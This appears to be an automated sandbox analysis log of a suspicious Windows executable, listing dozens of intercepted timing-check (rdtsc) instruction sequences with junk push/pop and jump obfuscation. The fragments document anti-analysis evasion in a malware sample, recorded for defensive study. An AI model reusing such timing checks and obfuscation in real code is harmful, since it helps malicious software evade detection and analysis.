Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A53C61 second address: A53C81 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E3850A357h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A53C81 second address: A53C8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A55C24 second address: A55C28 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A53C8A second address: A53C8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A569C0 second address: A569C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A569C4 second address: A569D8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E38E1CB20h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A569D8 second address: A569DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A57BD2 second address: A57BE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push eax 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A57BE0 second address: A57BE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A56CC0 second address: A56CC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A56CC4 second address: A56CCE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A56CCE second address: A56CD2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A56CD2 second address: A56CE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jp 00007F0E3850A346h 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A58C05 second address: A58C0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push edx 0x00000007 pop edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A57D3F second address: A57D49 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F0E3850A34Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A58C0D second address: A58C61 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a mov dword ptr [ebp+122D364Dh], eax 0x00000010 add dword ptr [ebp+122D35BAh], ecx 0x00000016 push 00000000h 0x00000018 mov edi, dword ptr [ebp+122D19C7h] 0x0000001e push 00000000h 0x00000020 push 00000000h 0x00000022 push ebp 0x00000023 call 00007F0E38E1CB18h 0x00000028 pop ebp 0x00000029 mov dword ptr [esp+04h], ebp 0x0000002d add dword ptr [esp+04h], 00000019h 0x00000035 inc ebp 0x00000036 push ebp 0x00000037 ret 0x00000038 pop ebp 0x00000039 ret 0x0000003a sub dword ptr [ebp+122D2772h], eax 0x00000040 mov bh, 2Eh 0x00000042 push eax 0x00000043 push eax 0x00000044 push edx 0x00000045 push eax 0x00000046 push edx 0x00000047 jnc 00007F0E38E1CB16h 0x0000004d rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A58C61 second address: A58C67 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A58C67 second address: A58C6D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A57D49 second address: A57DCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 jbe 00007F0E3850A34Ch 0x0000000d mov edi, dword ptr [ebp+122D1C81h] 0x00000013 push dword ptr fs:[00000000h] 0x0000001a jne 00007F0E3850A349h 0x00000020 mov dword ptr fs:[00000000h], esp 0x00000027 push 00000000h 0x00000029 push eax 0x0000002a call 00007F0E3850A348h 0x0000002f pop eax 0x00000030 mov dword ptr [esp+04h], eax 0x00000034 add dword ptr [esp+04h], 00000019h 0x0000003c inc eax 0x0000003d push eax 0x0000003e ret 0x0000003f pop eax 0x00000040 ret 0x00000041 mov ebx, 058E565Bh 0x00000046 xor dword ptr [ebp+122D3234h], esi 0x0000004c mov eax, dword ptr [ebp+122D001Dh] 0x00000052 mov bl, DBh 0x00000054 push FFFFFFFFh 0x00000056 jne 00007F0E3850A34Ah 0x0000005c nop 0x0000005d push eax 0x0000005e push edx 0x0000005f push ebx 0x00000060 jmp 00007F0E3850A355h 0x00000065 pop ebx 0x00000066 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A58C6D second address: A58C71 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A57DCD second address: A57DD2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A57DD2 second address: A57DD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A59D55 second address: A59D5B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A59D5B second address: A59D60 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A58DC0 second address: A58DC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A59D60 second address: A59D6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A59D6C second address: A59D75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A58DC4 second address: A58E4D instructions: 0x00000000 rdtsc 0x00000002 je 00007F0E38E1CB16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push dword ptr fs:[00000000h] 0x00000014 mov ebx, 3E0B501Ch 0x00000019 mov dword ptr fs:[00000000h], esp 0x00000020 push 00000000h 0x00000022 push edi 0x00000023 call 00007F0E38E1CB18h 0x00000028 pop edi 0x00000029 mov dword ptr [esp+04h], edi 0x0000002d add dword ptr [esp+04h], 00000016h 0x00000035 inc edi 0x00000036 push edi 0x00000037 ret 0x00000038 pop edi 0x00000039 ret 0x0000003a mov ebx, edx 0x0000003c mov edi, ebx 0x0000003e mov eax, dword ptr [ebp+122D11DDh] 0x00000044 push 00000000h 0x00000046 push ebx 0x00000047 call 00007F0E38E1CB18h 0x0000004c pop ebx 0x0000004d mov dword ptr [esp+04h], ebx 0x00000051 add dword ptr [esp+04h], 00000015h 0x00000059 inc ebx 0x0000005a push ebx 0x0000005b ret 0x0000005c pop ebx 0x0000005d ret 0x0000005e mov bx, 52F7h 0x00000062 push FFFFFFFFh 0x00000064 jmp 00007F0E38E1CB1Fh 0x00000069 push eax 0x0000006a push eax 0x0000006b push edx 0x0000006c jmp 00007F0E38E1CB1Ch 0x00000071 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A59D75 second address: A59D79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A58E4D second address: A58E53 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A59D79 second address: A59DEB instructions: 0x00000000 rdtsc 0x00000002 jns 00007F0E3850A346h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b nop 0x0000000c mov di, ax 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push edi 0x00000014 call 00007F0E3850A348h 0x00000019 pop edi 0x0000001a mov dword ptr [esp+04h], edi 0x0000001e add dword ptr [esp+04h], 00000019h 0x00000026 inc edi 0x00000027 push edi 0x00000028 ret 0x00000029 pop edi 0x0000002a ret 0x0000002b jmp 00007F0E3850A352h 0x00000030 push 00000000h 0x00000032 push 00000000h 0x00000034 push esi 0x00000035 call 00007F0E3850A348h 0x0000003a pop esi 0x0000003b mov dword ptr [esp+04h], esi 0x0000003f add dword ptr [esp+04h], 00000019h 0x00000047 inc esi 0x00000048 push esi 0x00000049 ret 0x0000004a pop esi 0x0000004b ret 0x0000004c push eax 0x0000004d jl 00007F0E3850A354h 0x00000053 push eax 0x00000054 push edx 0x00000055 push ebx 0x00000056 pop ebx 0x00000057 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A58E53 second address: A58E57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A66557 second address: A6655D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A6655D second address: A66565 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A66565 second address: A6656B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A6EF96 second address: A6EF9A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A6DD2D second address: A6DD43 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E3850A352h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A6DD43 second address: A6DD58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F0E38E1CB1Fh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A6E307 second address: A6E30B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A6E30B second address: A6E30F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A6E5BF second address: A6E5CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jp 00007F0E3850A346h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A6E5CD second address: A6E5D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A6E5D3 second address: A6E5DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A6E770 second address: A6E78C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E38E1CB28h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A6E78C second address: A6E791 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A6EB87 second address: A6EB8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A6ED03 second address: A6ED0D instructions: 0x00000000 rdtsc 0x00000002 js 00007F0E3850A346h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A6ED0D second address: A6ED13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A779BD second address: A779C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A76940 second address: A76946 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A76946 second address: A7694A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A7694A second address: A7698F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007F0E38E1CB22h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jl 00007F0E38E1CB2Fh 0x00000011 jmp 00007F0E38E1CB29h 0x00000016 pop edx 0x00000017 pop eax 0x00000018 jo 00007F0E38E1CB2Eh 0x0000001e push eax 0x0000001f push edx 0x00000020 push edi 0x00000021 pop edi 0x00000022 push edx 0x00000023 pop edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A7645B second address: A76488 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007F0E3850A357h 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push esi 0x0000000e pop esi 0x0000000f popad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 ja 00007F0E3850A34Ch 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A76488 second address: A764A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0E38E1CB27h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A77690 second address: A776B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F0E3850A351h 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 push edi 0x00000011 pop edi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A776B0 second address: A776B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A7CC2E second address: A7CC32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A8150C second address: A81510 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A3F38A second address: A3F398 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jl 00007F0E3850A346h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A3FB04 second address: A3FB20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0E38E1CB27h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A3FB20 second address: A3FB4E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E3850A34Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jo 00007F0E3850A364h 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F0E3850A352h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A3FB4E second address: A3FB52 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A4037B second address: A4037F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A404E0 second address: A4055F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E38E1CB26h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F0E38E1CB1Fh 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 pushad 0x00000014 pushad 0x00000015 jc 00007F0E38E1CB16h 0x0000001b push edi 0x0000001c pop edi 0x0000001d popad 0x0000001e pushad 0x0000001f jmp 00007F0E38E1CB23h 0x00000024 jmp 00007F0E38E1CB21h 0x00000029 popad 0x0000002a popad 0x0000002b mov eax, dword ptr [eax] 0x0000002d jmp 00007F0E38E1CB23h 0x00000032 mov dword ptr [esp+04h], eax 0x00000036 push eax 0x00000037 push edx 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b push edx 0x0000003c rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A4055F second address: A40563 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A40563 second address: A40569 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A4060B second address: A40614 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A40614 second address: A40632 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a lea eax, dword ptr [ebp+1248A071h] 0x00000010 mov dword ptr [ebp+1246C759h], ecx 0x00000016 cmc 0x00000017 nop 0x00000018 push eax 0x00000019 push edx 0x0000001a push ecx 0x0000001b pushad 0x0000001c popad 0x0000001d pop ecx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A80719 second address: A8071D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A80DD2 second address: A80DD8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A80DD8 second address: A80E1E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007F0E3850A35Ah 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e jmp 00007F0E3850A352h 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F0E3850A34Ah 0x0000001c jnc 00007F0E3850A358h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A80E1E second address: A80E23 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A80E23 second address: A80E2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F0E3850A346h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A80E2F second address: A80E35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: 9FCBB0 second address: 9FCBB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A82B80 second address: A82B8E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E38E1CB1Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A82B8E second address: A82BAA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E3850A352h 0x00000007 push eax 0x00000008 push edx 0x00000009 jno 00007F0E3850A346h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A82BAA second address: A82BAE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A88B27 second address: A88B2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A88B2D second address: A88B32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A878DD second address: A878E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A87E5A second address: A87E5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A87E5E second address: A87E85 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E3850A34Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jng 00007F0E3850A35Ch 0x0000000f jmp 00007F0E3850A34Ch 0x00000014 push edx 0x00000015 push ebx 0x00000016 pop ebx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A883CE second address: A883D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A883D4 second address: A883E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jnc 00007F0E3850A346h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A883E3 second address: A883EF instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jg 00007F0E38E1CB16h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A883EF second address: A883F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A883F5 second address: A88401 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A88401 second address: A8841C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0E3850A353h 0x00000009 push eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
